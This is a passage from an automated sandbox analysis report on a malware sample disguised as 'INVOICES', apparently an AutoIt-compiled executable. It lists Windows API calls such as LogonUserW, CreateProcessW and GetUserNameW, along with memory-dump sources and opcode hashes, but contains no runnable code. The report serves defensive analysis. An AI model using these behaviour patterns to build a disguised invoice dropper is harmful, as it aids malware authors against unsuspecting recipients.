• Instruction Fuzzy Hash: 35E012352001149FD7149F59D804A97BBD8AFA5760F00C156FD49D7251DAB5A8409B90
APIs
• NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 007BC968
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                  • Opcode ID: ead05bfda15bf3c0aba559e8443779e9343b10037ecd0c8c4a55e29bbc602f43
                                                                                                                                  • Instruction ID: c0e1e744053f41601d9ad53be9d153a63f577352de9b3c0f867367828e635e47
                                                                                                                                  • Opcode Fuzzy Hash: ead05bfda15bf3c0aba559e8443779e9343b10037ecd0c8c4a55e29bbc602f43
                                                                                                                                  • Instruction Fuzzy Hash: D4F03931200259ABDB21AE58DC09FD63B95AB09720F048018BB15272E2CA787920D7A4
                                                                                                                                  APIs
                                                                                                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00794D1D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: mouse_event
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2434400541-0
                                                                                                                                  • Opcode ID: b70b0588f27786b38b881586fefa0a8d6ef9118be5b73c8dadf9e1aa59205ced
                                                                                                                                  • Instruction ID: ff06212a047ea067a66685b7597bf6cb2bbf76ce41587739f4a86f443e7d0c12
                                                                                                                                  • Opcode Fuzzy Hash: b70b0588f27786b38b881586fefa0a8d6ef9118be5b73c8dadf9e1aa59205ced
                                                                                                                                  • Instruction Fuzzy Hash: ECD09EB836460579FC2C8B30BC1FF761229F709796FA446497702961C5A8EC6843A435
                                                                                                                                  APIs
                                                                                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007886B1), ref: 00788A93
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LogonUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1244722697-0
                                                                                                                                  • Opcode ID: 272fcdbcb9f44b570fbaf3e6310251950ce9b5895d34a0aba746a4db042fb093
                                                                                                                                  • Instruction ID: b96c463106a268822caf3d28d23ad4e6c9a69a122c92d166ee039201768ef986
                                                                                                                                  • Opcode Fuzzy Hash: 272fcdbcb9f44b570fbaf3e6310251950ce9b5895d34a0aba746a4db042fb093
                                                                                                                                  • Instruction Fuzzy Hash: C1D05E3226050EABEF019EA4DC02EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0076BB3C,?,?,?,?,?,?), ref: 007BC99E
                                                                                                                                    • Part of subcall function 007BB669: _memset.LIBCMT ref: 007BB678
                                                                                                                                    • Part of subcall function 007BB669: _memset.LIBCMT ref: 007BB687
                                                                                                                                    • Part of subcall function 007BB669: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007F6F20,007F6F64), ref: 007BB6B6
                                                                                                                                    • Part of subcall function 007BB669: CloseHandle.KERNEL32 ref: 007BB6C8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2364484715-0
                                                                                                                                  • Opcode ID: 885cc5f93bd499514d3b9e8d6365cdbad3a4bc92aef2f8ed1f0e8d36c422b474
                                                                                                                                  • Instruction ID: 23e3f3fbde2d8d9edf941f6c90cc9885f56a6605701bbe85cab4b99274250570
                                                                                                                                  • Opcode Fuzzy Hash: 885cc5f93bd499514d3b9e8d6365cdbad3a4bc92aef2f8ed1f0e8d36c422b474
                                                                                                                                  • Instruction Fuzzy Hash: 84E01231200208DFCB02AF04EC44E993BA5FB08314F008060FA05472B2C775AD20EF14
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00731AEE,?,?,?), ref: 007316AB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: 49fcca9768ac7462471f24d0246e32d7d26edea979e222b5bcd13826e4e32187
                                                                                                                                  • Instruction ID: 372519754da82893e1f0fcba337e4de7ad39afb7e7f02dd73844f933a7eb65ec
                                                                                                                                  • Opcode Fuzzy Hash: 49fcca9768ac7462471f24d0246e32d7d26edea979e222b5bcd13826e4e32187
                                                                                                                                  • Instruction Fuzzy Hash: B8E0EC35200208FBDF15AF90DC15E643F26FF58750F508428FA450A2A2CA3AB522DB54
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 007BC91E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                  • Opcode ID: 292e77ba6c7e84c0fe0942923c38e1f00dcaa1b700cfbd931d9f28da2e786e52
                                                                                                                                  • Instruction ID: 9a19fd6eb076e202ffe452e39ece877307fda3af1a8becb0fbd1eac61dbc0e4b
                                                                                                                                  • Opcode Fuzzy Hash: 292e77ba6c7e84c0fe0942923c38e1f00dcaa1b700cfbd931d9f28da2e786e52
                                                                                                                                  • Instruction Fuzzy Hash: 99E0E235200208EFCB01DF88D848E963BA5AB1D700F008054FA0547262C771A830EBA1
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 007BC8EF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: DialogNtdllProc_
• String ID:
• API String ID: 3239928679-0
• Opcode ID: 027a9e9b773c248a04c4603336014fee5efc094dca2f30cd8d5b8bf8c96ed0dd
• Instruction ID: e382fe9e1a0820fcc5e8d4d846f82d8c3b9389d7c8597a527cd900e5142fff9d
• Opcode Fuzzy Hash: 027a9e9b773c248a04c4603336014fee5efc094dca2f30cd8d5b8bf8c96ed0dd
• Instruction Fuzzy Hash: B0E0E235200208EFCB01DF88DC88E963BA5AB1D700F008054FA0547262C771A830EB61
APIs
  • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
  • Part of subcall function 0073201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007320D3
  • Part of subcall function 0073201B: KillTimer.USER32(-00000001,?,?,?,?,007316CB,00000000,?,?,00731AE2,?,?), ref: 0073216E
• NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00731AE2,?,?), ref: 007316D4
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Window$DestroyDialogKillLongNtdllProc_Timer
• String ID:
• API String ID: 2797419724-0
• Opcode ID: 5f6a6e690be7f8da6c5745d4d0ddb0077cf25ddb8cddd8fbe34eadef5afc4d8d
• Instruction ID: 0412bb9bc6912c9930e0f836889dd624f91974f7bfdd74bdbc2627cd922d806d
• Opcode Fuzzy Hash: 5f6a6e690be7f8da6c5745d4d0ddb0077cf25ddb8cddd8fbe34eadef5afc4d8d
• Instruction Fuzzy Hash: DFD01230240308F7EA203B50DC1FF593E199F14B50F40C020FB05291D3CA797821A568
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00772171
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: d5e4493ce346c29905801837c7987acdb6e691d62d5da2d570cff0d6ee2c651f
• Instruction ID: 07d24805ced3033947b2f656d1d2805a8eb520c567fa0fe78e5a698998191f59
• Opcode Fuzzy Hash: d5e4493ce346c29905801837c7987acdb6e691d62d5da2d570cff0d6ee2c651f
• Instruction Fuzzy Hash: A9C048F1801109DBCB05EBA0DA88EFEB7BCAB08304F2081A6E146F2110D7789B448B71
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0075A2AA
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: fc83450ad8e4b9ad6e8f8c2c539a091694dcd79032cfed2ec480597bf7ff47e0
• Instruction ID: 77eb02f5768379fd3b641c61d9c8ac366e738e6eb60ff829c90bbfe50c446bc3
• Opcode Fuzzy Hash: fc83450ad8e4b9ad6e8f8c2c539a091694dcd79032cfed2ec480597bf7ff47e0
• Instruction Fuzzy Hash: 5FA0113000020CAB8A002B82EC08888BFACEA00AA0B00C020F80E820228B32A8208A88
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 53cbafc915b9f240f36c9fea6bc6233e297fa7f531503f7195e8ef89b887dbaf
• Instruction ID: 33b295300358316c364bb24f63c400ffaf00e5289ee083d22819069090b78a5a
• Opcode Fuzzy Hash: 53cbafc915b9f240f36c9fea6bc6233e297fa7f531503f7195e8ef89b887dbaf
• Instruction Fuzzy Hash: 1D2224B0A0055ECFDF789E28C8D467CB7A1FB01344F68816AD956DB5A1EB3C9D81CB42
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction ID: ced935ac9f4fa4b5148f1c313dde4602478fdf32b259476c989f4b9fb3797893
• Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
• Instruction Fuzzy Hash: 10C173322060930ADB2D463994341BEBFA15AA37B335A075DECB3DB0D5EF58D52DD620
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction ID: a1c508289525e0853cce63eafcd70f0f4e085d09d01c1be15fa6f6cf923e89af
• Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
• Instruction Fuzzy Hash: A0C1943220619309DB2D463984341BEBFA15AA37B335A076DECB3DB1C5EF58D52DD620
Memory Dump Source
• Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction ID: 937e3ceae7a8eddbb4150e2399142d93fe6c233f746b20865f16601dd72761d5
• Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction Fuzzy Hash: 1E41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
Memory Dump Source
• Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
• Instruction ID: f8b62aacdd702187e13a9f1110ff4574b0ed9dd7f98d48519397c2036fb9b273
• Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
• Instruction Fuzzy Hash: 88018078A10109EFCB44DFA8C5909AEF7B5FB88310B208599E809A7741E730AE41DB80
Memory Dump Source
• Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
• Instruction ID: fae30b6d3988f8b2a644317f56156d4e2684487fcf6ff95e23a66626ba1f7af0
• Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
• Instruction Fuzzy Hash: 0F019278A00109EFCB44DFA8C590DAEF7F5FB48310F608599E809A7701E730AE41DB80
Memory Dump Source
• Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
• Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
• Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
• Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
APIs
• DeleteObject.GDI32(00000000), ref: 007A7970
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 007A7982
                                                                                                                                  • DestroyWindow.USER32 ref: 007A7990
                                                                                                                                  • GetDesktopWindow.USER32 ref: 007A79AA
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 007A79B1
                                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007A7AF2
                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007A7B02
                                                                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7B4A
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 007A7B56
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007A7B90
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7BB2
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7BC5
                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7BD0
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 007A7BD9
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7BE8
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 007A7BF1
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7BF8
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 007A7C03
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 007A7C15
                                                                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007C2CAC,00000000), ref: 007A7C2B
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 007A7C3B
                                                                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007A7C61
                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007A7C80
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7CA2
                                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7E8F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
